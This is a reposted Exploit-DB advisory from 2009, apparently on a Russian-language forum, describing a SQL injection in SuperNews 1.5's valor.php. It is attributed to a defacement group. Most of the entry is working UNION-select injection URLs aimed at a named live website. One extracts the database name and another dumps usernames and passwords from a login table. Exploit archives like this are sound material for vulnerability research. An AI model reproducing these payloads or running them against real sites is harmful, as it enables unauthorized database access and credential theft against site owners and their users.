- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8255
- Проверка EDB
-
- Пройдено
- Автор
- P3S0K!
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-03-23
Код:
#############################################################
SuperNews 1.5 SQL Injection in valor.php
#############################################################
###################################################
#[~] Author : p3s0k!
#[~] Terminal Hacker Team
###################################################
Example:
http://www.avhsj.com.br/noticias/valor.php?noticia=[SQL-Injection]
LiveDEMO:
http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5--
http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--
##############################
#[!] Terminal Hacker Defacers
#[!] www.TerminalHacker.es
##############################
# milw0rm.com [2009-03-23]- Источник
- www.exploit-db.com
